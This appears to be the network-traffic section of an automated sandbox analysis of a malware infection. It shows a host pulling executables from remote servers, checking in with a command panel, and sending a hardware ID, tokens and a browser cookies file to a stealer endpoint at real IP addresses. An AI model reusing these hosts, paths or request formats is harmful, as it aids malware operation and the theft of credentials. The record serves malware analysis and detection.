00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 02 Nov 2024 06:16:40 GMTContent-Type: application/octet-streamContent-Length: 2866688Last-Modified: Sat, 02 Nov 2024 05:02:10 GMTConnection: keep-aliveETag: "6725b252-2bbe00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 2c 00 00 04 00 00 45 06 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6b 72 77 74 73 66 73 73 00 60 2b 00 00 a0 00 00 00 5e 2b 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 73 73 65 76 71 6a 64 00 20 00 00 00 00 2c 00 00 04 00 00 00 98 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 2c 00 00 22 00 00 00 9c 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 02 Nov 2024 06:16:55 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 02 Nov 2024 06:16:58 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 02 Nov 2024 06:17:00 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: GET /panel/uploads/Fwkdsz.exe HTTP/1.1Host: wasni.care
                          Source: global trafficHTTP traffic detected: GET /panel/uploads/Luvzkkz.mp4 HTTP/1.1Host: wasni.careConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 30 33 33 33 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1003334001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 33 33 34 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003343001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 33 33 34 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003344001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJJEBFCGDAKFIEBAAFBHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 4a 45 42 46 43 47 44 41 4b 46 49 45 42 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 39 41 38 37 30 36 32 39 46 31 31 34 34 38 34 35 36 39 33 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4a 45 42 46 43 47 44 41 4b 46 49 45 42 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4a 45 42 46 43 47 44 41 4b 46 49 45 42 41 41 46 42 2d 2d 0d 0a Data Ascii: ------KKJJEBFCGDAKFIEBAAFBContent-Disposition: form-data; name="hwid"A89A870629F11448456937------KKJJEBFCGDAKFIEBAAFBContent-Disposition: form-data; name="build"tale------KKJJEBFCGDAKFIEBAAFB--
                          Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIJJJEBGCFBGDHIDGCAHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 4a 4a 4a 45 42 47 43 46 42 47 44 48 49 44 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 30 35 38 36 32 32 37 36 62 63 32 31 39 31 61 66 65 34 66 36 62 64 65 39 32 36 36 66 31 61 64 63 31 32 34 39 34 66 37 37 66 35 34 62 37 61 37 62 30 39 63 36 38 66 61 65 35 34 36 39 63 65 38 65 65 64 38 32 66 38 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 4a 4a 45 42 47 43 46 42 47 44 48 49 44 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 4a 4a 45 42 47 43 46 42 47 44 48 49 44 47 43 41 2d 2d 0d 0a Data Ascii: ------KFIJJJEBGCFBGDHIDGCAContent-Disposition: form-data; name="token"305862276bc2191afe4f6bde9266f1adc12494f77f54b7a7b09c68fae5469ce8eed82f89------KFIJJJEBGCFBGDHIDGCAContent-Disposition: form-data; name="message"browsers------KFIJJJEBGCFBGDHIDGCA--
                          Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDHDHIECGCAEBFIIDHIHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 48 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 30 35 38 36 32 32 37 36 62 63 32 31 39 31 61 66 65 34 66 36 62 64 65 39 32 36 36 66 31 61 64 63 31 32 34 39 34 66 37 37 66 35 34 62 37 61 37 62 30 39 63 36 38 66 61 65 35 34 36 39 63 65 38 65 65 64 38 32 66 38 39 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 48 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 48 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 2d 2d 0d 0a Data Ascii: ------EHDHDHIECGCAEBFIIDHIContent-Disposition: form-data; name="token"305862276bc2191afe4f6bde9266f1adc12494f77f54b7a7b09c68fae5469ce8eed82f89------EHDHDHIECGCAEBFIIDHIContent-Disposition: form-data; name="message"plugins------EHDHDHIECGCAEBFIIDHI--
                          Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGIJJDGCBKFIDHIEBKEHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 30 35 38 36 32 32 37 36 62 63 32 31 39 31 61 66 65 34 66 36 62 64 65 39 32 36 36 66 31 61 64 63 31 32 34 39 34 66 37 37 66 35 34 62 37 61 37 62 30 39 63 36 38 66 61 65 35 34 36 39 63 65 38 65 65 64 38 32 66 38 39 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 2d 2d 0d 0a Data Ascii: ------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="token"305862276bc2191afe4f6bde9266f1adc12494f77f54b7a7b09c68fae5469ce8eed82f89------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="message"fplugins------HDGIJJDGCBKFIDHIEBKE--
                          Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHJDGIJECGDHJJECGHHost: 185.215.113.206Content-Length: 6631Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /746f34465cf17784/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 33 33 34 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003345001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 33 33 34 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003346001&unit=246122658369
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBKKKKKFBGDGDHIDBGHHost: 185.215.113.206Content-Length: 427Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 30 35 38 36 32 32 37 36 62 63 32 31 39 31 61 66 65 34 66 36 62 64 65 39 32 36 36 66 31 61 64 63 31 32 34 39 34 66 37 37 66 35 34 62 37 61 37 62 30 39 63 36 38 66 61 65 35 34 36 39 63 65 38 65 65 64 38 32 66 38 39 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 